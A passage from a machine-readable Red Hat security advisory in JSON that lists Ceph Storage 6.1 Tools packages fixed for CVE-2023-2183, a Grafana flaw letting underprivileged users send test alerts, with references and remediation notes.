"9Base-RHCEPH-6.1-Tools:rbd-nbd-debuginfo-2:17.2.6-167.el9cp.s390x" }, "product_reference": "rbd-nbd-debuginfo-2:17.2.6-167.el9cp.s390x", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" }, { "category": "default_component_of", "full_product_name": { "name": "rbd-nbd-debuginfo-2:17.2.6-167.el9cp.x86_64 as a component of Red Hat Ceph Storage 6.1 Tools", "product_id": "9Base-RHCEPH-6.1-Tools:rbd-nbd-debuginfo-2:17.2.6-167.el9cp.x86_64" }, "product_reference": "rbd-nbd-debuginfo-2:17.2.6-167.el9cp.x86_64", "relates_to_product_reference": "9Base-RHCEPH-6.1-Tools" } ] }, "vulnerabilities": [ { "acknowledgments": [ { "names": [ "Grafana Security Team" ], "summary": "Acknowledged by upstream." } ], "cve": "CVE-2023-2183", "cwe": { "id": "CWE-284", "name": "Improper Access Control" }, "discovery_date": "2023-05-29T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2210848" } ], "notes": [ { "category": "description", "text": "A flaw was found in grafana. This issue may allow a malicious user to craft a request to the API that enables them to send alert messages via the \"API Alert - Test\".", "title": "Vulnerability description" }, { "category": "summary", "text": "grafana: missing access control allows test alerts by underprivileged user", "title": "Vulnerability summary" }, { "category": "other", "text": "OpenShift ServiceMesh (OSSM) has switched to using upstream rhel rpms for grafana, and is no longer maintaining the servicemesh-grafana package. Hence, it is marked as affected/won\u0027tfix.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "9Base-RHCEPH-6.1-Tools:ceph-2:17.2.6-167.el9cp.src", "9Base-RHCEPH-6.1-Tools:ceph-base-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-base-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-base-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-base-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-base-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-base-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-common-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-common-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-common-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-common-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-common-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-common-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-debugsource-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-debugsource-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-debugsource-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-exporter-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-exporter-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-exporter-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-fuse-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-fuse-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-fuse-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-fuse-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-fuse-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-fuse-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-immutable-object-cache-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-immutable-object-cache-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-immutable-object-cache-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-immutable-object-cache-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-immutable-object-cache-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-immutable-object-cache-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-mds-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-mds-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-mds-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-mgr-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-mgr-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-mgr-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-mib-2:17.2.6-167.el9cp.noarch", "9Base-RHCEPH-6.1-Tools:ceph-mon-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-mon-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-mon-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-osd-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-osd-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-osd-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-radosgw-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-radosgw-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-radosgw-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-resource-agents-2:17.2.6-167.el9cp.noarch", "9Base-RHCEPH-6.1-Tools:ceph-selinux-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-selinux-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-selinux-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-test-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-test-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-test-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:cephadm-2:17.2.6-167.el9cp.noarch", "9Base-RHCEPH-6.1-Tools:cephadm-ansible-1:2.18.0-1.el9cp.noarch", "9Base-RHCEPH-6.1-Tools:cephadm-ansible-1:2.18.0-1.el9cp.src", "9Base-RHCEPH-6.1-Tools:cephfs-mirror-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:cephfs-mirror-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:cephfs-mirror-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:cephfs-top-2:17.2.6-167.el9cp.noarch", "9Base-RHCEPH-6.1-Tools:libcephfs-devel-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:libcephfs-devel-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:libcephfs-devel-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:libcephfs2-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:libcephfs2-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:libcephfs2-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:libcephfs2-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:libcephfs2-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:libcephfs2-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:libcephsqlite-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:libcephsqlite-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:libcephsqlite-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:librados-devel-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:librados-devel-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:librados-devel-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:librados-devel-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:librados-devel-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:librados-devel-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:librados2-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:librados2-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:librados2-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:librados2-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:librados2-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:librados2-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:libradospp-devel-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:libradospp-devel-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:libradospp-devel-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:libradosstriper1-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:libradosstriper1-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:libradosstriper1-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:libradosstriper1-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:libradosstriper1-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:libradosstriper1-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:librbd-devel-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:librbd-devel-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:librbd-devel-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:librbd1-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:librbd1-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:librbd1-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:librbd1-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:librbd1-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:librbd1-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:librgw-devel-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:librgw-devel-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:librgw-devel-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:librgw2-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:librgw2-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:librgw2-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:librgw2-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:librgw2-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:librgw2-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:python3-ceph-argparse-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:python3-ceph-argparse-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:python3-ceph-argparse-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:python3-ceph-common-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:python3-ceph-common-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:python3-ceph-common-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:python3-cephfs-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:python3-cephfs-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:python3-cephfs-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:python3-cephfs-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:python3-cephfs-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:python3-cephfs-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:python3-rados-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:python3-rados-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:python3-rados-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:python3-rados-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:python3-rados-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:python3-rados-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:python3-rbd-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:python3-rbd-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:python3-rbd-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:python3-rbd-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:python3-rbd-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:python3-rbd-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:python3-rgw-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:python3-rgw-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:python3-rgw-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:python3-rgw-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:python3-rgw-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:python3-rgw-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:rbd-fuse-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:rbd-fuse-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:rbd-fuse-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:rbd-mirror-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:rbd-mirror-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:rbd-mirror-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:rbd-nbd-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:rbd-nbd-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:rbd-nbd-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:rbd-nbd-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:rbd-nbd-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:rbd-nbd-debuginfo-2:17.2.6-167.el9cp.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2023-2183" }, { "category": "external", "summary": "RHBZ#2210848", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2210848" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2023-2183", "url": "https://www.cve.org/CVERecord?id=CVE-2023-2183" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-2183", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-2183" }, { "category": "external", "summary": "https://grafana.com/security/security-advisories/cve-2023-2183/", "url": "https://grafana.com/security/security-advisories/cve-2023-2183/" } ], "release_date": "2023-06-06T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2023-12-12T13:59:00+00:00", "details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_ceph_storage/6\n\nFor supported configurations, refer to:\n\nhttps://access.redhat.com/articles/1548993", "product_ids": [ "9Base-RHCEPH-6.1-Tools:ceph-2:17.2.6-167.el9cp.src", "9Base-RHCEPH-6.1-Tools:ceph-base-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-base-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-base-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-base-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-base-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-base-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-common-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-common-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-common-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-common-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-common-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-common-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-debugsource-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-debugsource-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-debugsource-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-exporter-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-exporter-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-exporter-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-fuse-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-fuse-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-fuse-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-fuse-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-fuse-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-fuse-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-immutable-object-cache-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-immutable-object-cache-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-immutable-object-cache-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-immutable-object-cache-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-immutable-object-cache-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-immutable-object-cache-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-mds-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-mds-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-mds-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-mgr-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-mgr-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-mgr-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-mib-2:17.2.6-167.el9cp.noarch", "9Base-RHCEPH-6.1-Tools:ceph-mon-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-mon-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-mon-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-osd-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-osd-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-osd-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-radosgw-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-radosgw-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-radosgw-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-resource-agents-2:17.2.6-167.el9cp.noarch", "9Base-RHCEPH-6.1-Tools:ceph-selinux-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-selinux-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-selinux-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:ceph-test-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:ceph-test-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:ceph-test-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:cephadm-2:17.2.6-167.el9cp.noarch", "9Base-RHCEPH-6.1-Tools:cephadm-ansible-1:2.18.0-1.el9cp.noarch", "9Base-RHCEPH-6.1-Tools:cephadm-ansible-1:2.18.0-1.el9cp.src", "9Base-RHCEPH-6.1-Tools:cephfs-mirror-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:cephfs-mirror-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:cephfs-mirror-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:cephfs-top-2:17.2.6-167.el9cp.noarch", "9Base-RHCEPH-6.1-Tools:libcephfs-devel-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:libcephfs-devel-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:libcephfs-devel-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:libcephfs2-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:libcephfs2-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:libcephfs2-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:libcephfs2-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:libcephfs2-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:libcephfs2-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:libcephsqlite-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:libcephsqlite-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:libcephsqlite-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:librados-devel-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:librados-devel-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:librados-devel-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:librados-devel-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:librados-devel-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:librados-devel-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:librados2-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:librados2-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:librados2-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:librados2-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:librados2-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:librados2-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:libradospp-devel-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:libradospp-devel-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:libradospp-devel-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:libradosstriper1-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:libradosstriper1-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:libradosstriper1-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:libradosstriper1-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:libradosstriper1-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:libradosstriper1-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:librbd-devel-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:librbd-devel-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:librbd-devel-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:librbd1-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:librbd1-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:librbd1-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:librbd1-debuginfo-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:librbd1-debuginfo-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:librbd1-debuginfo-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:librgw-devel-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:librgw-devel-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:librgw-devel-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:librgw2-2:17.2.6-167.el9cp.ppc64le", "9Base-RHCEPH-6.1-Tools:librgw2-2:17.2.6-167.el9cp.s390x", "9Base-RHCEPH-6.1-Tools:librgw2-2:17.2.6-167.el9cp.x86_64", "9Base-RHCEPH-6.1-Tools:librgw2-debuginfo-2:17.2.6-167.el9cp.ppc64le", 